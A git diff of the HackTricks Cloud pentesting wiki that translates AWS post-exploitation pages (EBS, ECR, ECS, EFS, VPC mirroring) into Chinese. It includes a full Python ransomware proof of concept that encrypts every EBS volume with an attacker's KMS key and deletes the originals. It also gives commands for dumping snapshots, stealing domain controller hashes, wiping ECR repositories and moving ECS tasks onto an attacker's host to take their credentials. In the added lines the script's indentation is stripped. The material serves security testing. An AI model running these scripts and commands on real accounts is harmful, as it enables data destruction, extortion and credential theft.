AWS Account Id]:user/AttackSim" +}, +"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], +"Resource": "*", +"Condition": { +"Bool": { +"kms:GrantIsForAWSResource": "true" +} +} +} +] } ``` - -Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume. +等待新设置的密钥策略传播。然后返回到“受害者”账户,尝试附加一个新加密的EBS卷。你会发现你可以附加该卷。 ![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4) -But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it. 
+但是当你尝试实际启动带有加密EBS卷的EC2实例时,它将失败,并且会从“待处理”状态永远返回到“已停止”状态,因为附加的EBS卷无法使用密钥解密,因为密钥策略不再允许。 ![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0) -This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day. - +这是使用的python脚本。它获取“受害者”账户的AWS凭证和用于加密的公开可用AWS ARN值。该脚本将对目标AWS账户中所有EC2实例附加的所有可用EBS卷进行加密副本,然后停止每个EC2实例,分离原始EBS卷,删除它们,最后删除在此过程中使用的所有快照。这将只在目标“受害者”账户中留下加密的EBS卷。仅在测试环境中使用此脚本,它是破坏性的,并将删除所有原始EBS卷。你可以使用所使用的KMS密钥恢复它们,并通过快照将它们恢复到原始状态,但我只是想让你意识到,这在最终是一个勒索软件的概念验证。 ``` import boto3 import argparse from botocore.exceptions import ClientError def enumerate_ec2_instances(ec2_client): - instances = ec2_client.describe_instances() - instance_volumes = {} - for reservation in instances['Reservations']: - for instance in reservation['Instances']: - instance_id = instance['InstanceId'] - volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] - instance_volumes[instance_id] = volumes - return instance_volumes +instances = ec2_client.describe_instances() +instance_volumes = {} +for reservation in instances['Reservations']: +for instance in reservation['Instances']: +instance_id = instance['InstanceId'] +volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] +instance_volumes[instance_id] = volumes +return instance_volumes def snapshot_volumes(ec2_client, volumes): - snapshot_ids = [] - for volume_id in volumes: - snapshot = ec2_client.create_snapshot(VolumeId=volume_id) - snapshot_ids.append(snapshot['SnapshotId']) - return snapshot_ids +snapshot_ids = [] +for volume_id in volumes: +snapshot = ec2_client.create_snapshot(VolumeId=volume_id) +snapshot_ids.append(snapshot['SnapshotId']) +return snapshot_ids def wait_for_snapshots(ec2_client, snapshot_ids): - for snapshot_id in snapshot_ids: - ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) +for snapshot_id in snapshot_ids: +ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn): - new_volume_ids = [] - for snapshot_id in snapshot_ids: - snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] - volume_id = snapshot_info['VolumeId'] - volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] - availability_zone = volume_info['AvailabilityZone'] +new_volume_ids = [] +for snapshot_id in snapshot_ids: +snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] +volume_id = snapshot_info['VolumeId'] +volume_info = 
ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] +availability_zone = volume_info['AvailabilityZone'] - volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, - Encrypted=True, KmsKeyId=kms_key_arn) - new_volume_ids.append(volume['VolumeId']) - return new_volume_ids +volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, +Encrypted=True, KmsKeyId=kms_key_arn) +new_volume_ids.append(volume['VolumeId']) +return new_volume_ids def stop_instances(ec2_client, instance_ids): - for instance_id in instance_ids: - try: - instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) - instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] +for instance_id in instance_ids: +try: +instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) +instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] - if instance_state == 'running': - ec2_client.stop_instances(InstanceIds=[instance_id]) - print(f"Stopping instance: {instance_id}") - ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) - print(f"Instance {instance_id} stopped.") - else: - print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") +if instance_state == 'running': +ec2_client.stop_instances(InstanceIds=[instance_id]) +print(f"Stopping instance: {instance_id}") +ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) +print(f"Instance {instance_id} stopped.") +else: +print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") - except ClientError as e: - print(f"Error stopping instance {instance_id}: {e}") +except ClientError as e: +print(f"Error stopping instance {instance_id}: {e}") def detach_and_delete_volumes(ec2_client, volumes): - for volume_id in volumes: - try: - ec2_client.detach_volume(VolumeId=volume_id) - ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) - ec2_client.delete_volume(VolumeId=volume_id) - print(f"Deleted volume: {volume_id}") - except ClientError as e: - print(f"Error detaching or deleting volume {volume_id}: {e}") +for volume_id in volumes: +try: +ec2_client.detach_volume(VolumeId=volume_id) +ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) +ec2_client.delete_volume(VolumeId=volume_id) +print(f"Deleted volume: {volume_id}") +except ClientError as e: +print(f"Error detaching or deleting volume {volume_id}: {e}") def delete_snapshots(ec2_client, snapshot_ids): - for snapshot_id in snapshot_ids: - try: - ec2_client.delete_snapshot(SnapshotId=snapshot_id) - print(f"Deleted snapshot: {snapshot_id}") - except ClientError as e: - print(f"Error deleting snapshot {snapshot_id}: {e}") +for snapshot_id in snapshot_ids: +try: +ec2_client.delete_snapshot(SnapshotId=snapshot_id) +print(f"Deleted snapshot: {snapshot_id}") +except ClientError as e: +print(f"Error deleting snapshot {snapshot_id}: {e}") def replace_volumes(ec2_client, instance_volumes): - instance_ids = list(instance_volumes.keys()) - stop_instances(ec2_client, instance_ids) +instance_ids = list(instance_volumes.keys()) +stop_instances(ec2_client, instance_ids) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - detach_and_delete_volumes(ec2_client, all_volumes) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] 
+detach_and_delete_volumes(ec2_client, all_volumes) def ebs_lock(access_key, secret_key, region, kms_key_arn): - ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) +ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) - instance_volumes = enumerate_ec2_instances(ec2_client) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - snapshot_ids = snapshot_volumes(ec2_client, all_volumes) - wait_for_snapshots(ec2_client, snapshot_ids) - create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached - replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes - delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed +instance_volumes = enumerate_ec2_instances(ec2_client) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +snapshot_ids = snapshot_volumes(ec2_client, all_volumes) +wait_for_snapshots(ec2_client, snapshot_ids) +create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached +replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes +delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed def parse_arguments(): - parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool') - parser.add_argument('--access-key', required=True, help='AWS Access Key ID') - parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') - parser.add_argument('--region', required=True, help='AWS Region') - parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption') - return parser.parse_args() +parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool') +parser.add_argument('--access-key', required=True, help='AWS Access Key ID') +parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') +parser.add_argument('--region', required=True, help='AWS Region') +parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption') +return parser.parse_args() def main(): - args = parse_arguments() - ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) +args = parse_arguments() +ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) - instance_volumes = enumerate_ec2_instances(ec2_client) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - snapshot_ids = snapshot_volumes(ec2_client, all_volumes) - wait_for_snapshots(ec2_client, snapshot_ids) - create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) - replace_volumes(ec2_client, instance_volumes) - delete_snapshots(ec2_client, snapshot_ids) +instance_volumes = enumerate_ec2_instances(ec2_client) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +snapshot_ids = snapshot_volumes(ec2_client, all_volumes) +wait_for_snapshots(ec2_client, snapshot_ids) +create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) +replace_volumes(ec2_client, instance_volumes) +delete_snapshots(ec2_client, snapshot_ids) if __name__ == "__main__": - main() +main() ``` - 
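A sketch of how the script above could be invoked (the file name is hypothetical and the credentials, region and KMS key ARN are placeholders):
```bash
# Hypothetical invocation; the flags match the argparse definition in the script above
python3 ebs_ransomware_poc.py \
  --access-key AKIAXXXXXXXXXXXXXXXX \
  --secret-key <victim-secret-access-key> \
  --region us-east-1 \
  --kms-key-arn arn:aws:kms:us-east-1:<attacker-account-id>:key/<key-id>
```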
{{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md index 7a9a19cc4..95a90a179 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md @@ -1,9 +1,8 @@ -# AWS - EBS Snapshot Dump +# AWS - EBS 快照转储 {{#include ../../../../banners/hacktricks-training.md}} -## Checking a snapshot locally - +## 本地检查快照 ```bash # Install dependencies pip install 'dsnap[cli]' @@ -32,10 +31,8 @@ cd dsnap make docker/build IMAGE=".img" make docker/run #With the snapshot downloaded ``` - > [!CAUTION] -> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: - +> **注意** `dsnap` 不允许您下载公共快照。要绕过此限制,您可以在您的个人账户中复制快照,然后下载该快照: ```bash # Copy the snapshot aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57" @@ -49,59 +46,55 @@ dsnap --region us-east-2 get snap-027da41be451109da # Delete the snapshot after downloading aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2 ``` +有关此技术的更多信息,请查看原始研究 [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) -For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) - -You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) - -## Checking a snapshot in AWS +您可以使用 Pacu 的模块 [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) 来执行此操作 +## 在 AWS 中检查快照 ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 ``` +**在您控制的 EC2 虚拟机中挂载它**(它必须与备份的副本位于同一区域): -**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): +步骤 1:通过前往 EC2 –> 卷,创建一个您喜欢的大小和类型的新卷。 -Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes. +要执行此操作,请遵循以下命令: -To be able to perform this action, follow these commands: +- 创建一个 EBS 卷以附加到 EC2 实例。 +- 确保 EBS 卷和实例位于同一区域。 -- Create an EBS volume to attach to the EC2 instance. -- Ensure that the EBS volume and the instance are in the same zone. +步骤 2:通过右键单击创建的卷,选择“附加卷”选项。 -Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. +步骤 3:从实例文本框中选择实例。 -Step 3: The instance from the instance text box is to be selected. +要执行此操作,请使用以下命令: -To be able to perform this action, use the following command: +- 附加 EBS 卷。 -- Attach the EBS volume. +步骤 4:登录到 EC2 实例,并使用命令 `lsblk` 列出可用磁盘。 -Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. +步骤 5:使用命令 `sudo file -s /dev/xvdf` 检查卷是否有任何数据。 -Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`. 
+如果上述命令的输出显示 "/dev/xvdf: data",则表示卷是空的。 -If the output of the above command shows "/dev/xvdf: data", it means the volume is empty. +步骤 6:使用命令 `sudo mkfs -t ext4 /dev/xvdf` 将卷格式化为 ext4 文件系统。或者,您也可以使用命令 `sudo mkfs -t xfs /dev/xvdf` 使用 xfs 格式。请注意,您应该使用 ext4 或 xfs 中的任意一种。 -Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs. +步骤 7:创建一个您选择的目录以挂载新的 ext4 卷。例如,您可以使用名称 "newvolume"。 -Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume". +要执行此操作,请使用命令 `sudo mkdir /newvolume`。 -To be able to perform this action, use the command `sudo mkdir /newvolume`. +步骤 8:使用命令 `sudo mount /dev/xvdf /newvolume/` 将卷挂载到 "newvolume" 目录。 -Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`. +步骤 9:切换到 "newvolume" 目录并检查磁盘空间以验证卷挂载。 -Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount. +要执行此操作,请使用以下命令: -To be able to perform this action, use the following commands: +- 切换到 `/newvolume`。 +- 使用命令 `df -h .` 检查磁盘空间。此命令的输出应显示 "newvolume" 目录中的可用空间。 -- Change directory to `/newvolume`. -- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. - -You can do this with Pacu using the module `ebs__explore_snapshots`. - -## Checking a snapshot in AWS (using cli) +您可以使用 Pacu 通过模块 `ebs__explore_snapshots` 来完成此操作。 +## 在 AWS 中检查快照(使用 cli) ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id @@ -127,19 +120,14 @@ sudo mount /dev/xvdh1 /mnt ls /mnt ``` - ## Shadow Copy -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. +任何拥有 **`EC2:CreateSnapshot`** 权限的 AWS 用户都可以通过创建 **域控制器的快照**,将其挂载到他们控制的实例上,并 **导出 NTDS.dit 和 SYSTEM** 注册表蜂巢文件,以窃取所有域用户的哈希值,供 Impacket 的 secretsdump 项目使用。 -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. 
+您可以使用此工具来自动化攻击:[https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy),或者在创建快照后使用之前的技术之一。 ## References - [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md index eb3b5f33f..765c1d31e 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md @@ -4,16 +4,12 @@ **Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** -Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. +在云环境中进行被动网络检查一直是**具有挑战性的**,需要对网络流量进行重大配置更改。然而,AWS引入了一项名为“**VPC流量镜像**”的新功能,以简化此过程。通过VPC流量镜像,可以**复制**VPC内的网络流量,而无需在实例上安装任何软件。这些复制的流量可以发送到网络入侵检测系统(IDS)进行**分析**。 -To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. +为了满足**自动部署**镜像和提取VPC流量所需基础设施的需求,我们开发了一个名为“**malmirror**”的概念验证脚本。该脚本可以与**被攻陷的AWS凭证**一起使用,以在目标VPC中为所有支持的EC2实例设置镜像。需要注意的是,VPC流量镜像仅支持由AWS Nitro系统提供支持的EC2实例,并且VPC镜像目标必须与被镜像主机位于同一VPC中。 -The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. +恶意VPC流量镜像的**影响**可能是显著的,因为它允许攻击者访问在VPC中传输的**敏感信息**。考虑到VPC中存在**明文流量**,这种恶意镜像的**可能性**很高。许多公司在其内部网络中使用明文协议以**性能原因**,假设传统的中间人攻击是不可能的。 -For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. 
+有关更多信息和访问[**malmirror脚本**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror),可以在我们的**GitHub存储库**中找到。该脚本自动化并简化了该过程,使其对攻击性研究目的**快速、简单且可重复**。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md index a971ea769..74562fa02 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md @@ -1,17 +1,16 @@ -# AWS - ECR Post Exploitation +# AWS - ECR 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## ECR -For more information check +有关更多信息,请查看 {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Login, Pull & Push - +### 登录、拉取和推送 ```bash # Docker login into ecr ## For public repo (always use us-east-1) @@ -38,17 +37,16 @@ docker push .dkr.ecr..amazonaws.com/purplepanda:latest # Downloading without Docker # List digests aws ecr batch-get-image --repository-name level2 \ - --registry-id 653711331788 \ - --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' +--registry-id 653711331788 \ +--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' ## Download a digest aws ecr get-download-url-for-layer \ - --repository-name level2 \ - --registry-id 653711331788 \ - --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" +--repository-name level2 \ +--registry-id 653711331788 \ +--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" ``` - -After downloading the images you should **check them for sensitive info**: +下载图像后,您应该**检查它们是否包含敏感信息**: {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics @@ -56,25 +54,24 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage` -An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository. 
- +拥有这些权限的攻击者可以**创建或修改生命周期策略以删除存储库中的所有图像**,然后**删除整个 ECR 存储库**。这将导致存储库中所有容器图像的丢失。 ```bash bashCopy code# Create a JSON file with the malicious lifecycle policy echo '{ - "rules": [ - { - "rulePriority": 1, - "description": "Delete all images", - "selection": { - "tagStatus": "any", - "countType": "imageCountMoreThan", - "countNumber": 0 - }, - "action": { - "type": "expire" - } - } - ] +"rules": [ +{ +"rulePriority": 1, +"description": "Delete all images", +"selection": { +"tagStatus": "any", +"countType": "imageCountMoreThan", +"countNumber": 0 +}, +"action": { +"type": "expire" +} +} +] }' > malicious_policy.json # Apply the malicious lifecycle policy to the ECR repository @@ -92,9 +89,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag # Delete multiple images from the ECR public repository aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md index 1d2fd80a5..54a2f7f6d 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md @@ -1,53 +1,48 @@ -# AWS - ECS Post Exploitation +# AWS - ECS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Host IAM Roles +### 主机 IAM 角色 -In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ -Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: +在 ECS 中,**IAM 角色可以分配给在容器内运行的任务**。**如果**任务在 **EC2** 实例内运行,**EC2 实例**将附加 **另一个 IAM** 角色。\ +这意味着如果你成功 **攻陷** 一个 ECS 实例,你可能会 **获得与 ECR 和 EC2 实例相关联的 IAM 角色**。有关如何获取这些凭据的更多信息,请查看: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} > [!CAUTION] -> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. +> 请注意,如果 EC2 实例强制使用 IMDSv2, [**根据文档**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html),**PUT 请求的响应**将具有 **跳数限制为 1**,使得无法从 EC2 实例内的容器访问 EC2 元数据。 -### Privesc to node to steal other containers creds & secrets +### 提权到节点以窃取其他容器的凭据和秘密 -But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. 
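A minimal sketch of what this looks like from a compromised node, assuming access to the Docker socket (container IDs are placeholders and `curl` may not exist in every target container):
```bash
# List the task containers running on the same node
docker ps

# Option 1: read the task-role credentials URI from the container environment without entering it
docker inspect <container_id> | grep AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

# Option 2: exec into another task's container and query the ECS credentials endpoint
docker exec -it <container_id> sh -c 'curl -s "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"'
```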
+此外,EC2 使用 docker 来运行 ECs 任务,因此如果你能够逃逸到节点或 **访问 docker 套接字**,你可以 **检查** 哪些 **其他容器** 正在运行,甚至可以 **进入它们** 并 **窃取** 附加的 IAM 角色。 -#### Making containers run in current host - -Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. +#### 使容器在当前主机上运行 +此外,**EC2 实例角色**通常会拥有足够的 **权限** 来 **更新集群内作为节点使用的 EC2 实例的容器实例状态**。攻击者可以将 **实例的状态修改为 DRAINING**,然后 ECS 将 **从中移除所有任务**,而作为 **REPLICA** 运行的任务将 **在不同的实例中运行,** 可能在 **攻击者的实例** 内,这样他就可以 **窃取它们的 IAM 角色** 和潜在的敏感信息。 ```bash aws ecs update-container-instances-state \ - --cluster --status DRAINING --container-instances +--cluster --status DRAINING --container-instances ``` - -The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** - +相同的技术可以通过 **从集群中注销 EC2 实例** 来实现。这可能不那么隐蔽,但它将 **强制任务在其他实例中运行:** ```bash aws ecs deregister-container-instance \ - --cluster --container-instance --force +--cluster --container-instance --force ``` - -A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: - +一种强制重新执行任务的最终技术是通过指示ECS **任务或容器已停止**。有3个潜在的API可以做到这一点: ```bash # Needs: ecs:SubmitTaskStateChange aws ecs submit-task-state-change --cluster \ - --status STOPPED --reason "anything" --containers [...] +--status STOPPED --reason "anything" --containers [...] # Needs: ecs:SubmitContainerStateChange aws ecs submit-container-state-change ... @@ -55,13 +50,8 @@ aws ecs submit-container-state-change ... # Needs: ecs:SubmitAttachmentStateChanges aws ecs submit-attachment-state-changes ... ``` +### 从ECR容器中窃取敏感信息 -### Steal sensitive info from ECR containers - -The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could search for sensitive info in them). +EC2实例可能还具有权限`ecr:GetAuthorizationToken`,允许它**下载镜像**(您可以在其中搜索敏感信息)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md index 35b644689..466275cf4 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - EFS Post Exploitation +# AWS - EFS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## EFS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-efs-enum.md @@ -12,47 +12,35 @@ For more information check: ### `elasticfilesystem:DeleteMountTarget` -An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. - +攻击者可以删除挂载目标,可能会干扰依赖该挂载目标的应用程序和用户对 EFS 文件系统的访问。 ```sql aws efs 